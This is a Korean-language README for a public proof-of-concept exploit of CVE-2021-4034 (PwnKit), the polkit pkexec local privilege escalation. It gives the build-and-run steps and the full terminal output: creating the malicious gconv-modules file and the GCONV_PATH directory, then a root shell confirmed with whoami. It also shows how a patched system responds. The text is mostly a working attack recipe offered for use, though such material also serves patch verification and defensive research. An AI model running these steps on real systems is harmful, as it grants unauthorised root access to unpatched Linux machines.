
CVE-2021-4034에 대한 익스플로잇으로, polkit의 pkexec에서 발생하는 로컬 권한 상승 취약점이며, 공유 라이브러리와 GCONV_PATH 조작을 통해 루트 셸을 제공합니다.
polkit 권한 상승 익스플로잇을 위한 원데이
make, ./cve-2021-4034를 실행하기만 하면 루트 셸을 얻을 수 있습니다.
실제 작성자가 제공한 원본 권고는 여기에서 확인할 수 있습니다.
익스플로잇이 성공하면 즉시 루트 셸을 얻을 수 있습니다:
localuser@ubuntu-poc:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
localuser@ubuntu-poc:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit
대부분의 시스템에서 polkit을 업데이트하면 익스플로잇이 패치되므로, 사용법이 출력된 후 프로그램이 종료됩니다:
localuser@ubuntu-poc:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
See the pkexec manual page for more details.
localuser@ubuntu-poc:~/CVE-2021-4034$